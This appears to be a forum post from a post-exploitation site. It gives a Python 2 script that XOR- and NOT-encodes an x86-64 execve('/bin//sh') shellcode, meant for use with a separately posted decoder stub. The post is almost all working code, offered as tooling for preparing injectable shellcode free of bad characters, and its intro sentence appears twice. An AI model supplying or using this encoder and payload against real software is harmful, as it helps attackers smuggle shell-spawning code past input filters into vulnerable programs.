Tweet
This is the encoder script for the decoder stub in https://www.postexplo.com/forum/prog...r-stub-example
It is pretty simple and does not guarantee bad chars are not present after encoding. You have to pick a decent value while XORing and manually verify the result.
It is pretty simple and does not guarantee bad chars are not present after encoding. You have to pick a decent value while XORing and manually verify the result.
Code:
#!/usr/bin/python
shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05") # Shellcode to encode
encoded = ""
encoded2 = ""
for x in bytearray(shellcode) :
# Encoding
y = x^0xAA # XOR with a proper value to avoid whatever bad chars you cannot use
z = ~y # NOT
encoded += '\\x'
encoded += '%02x' % (z & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' % (z & 0xff)
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))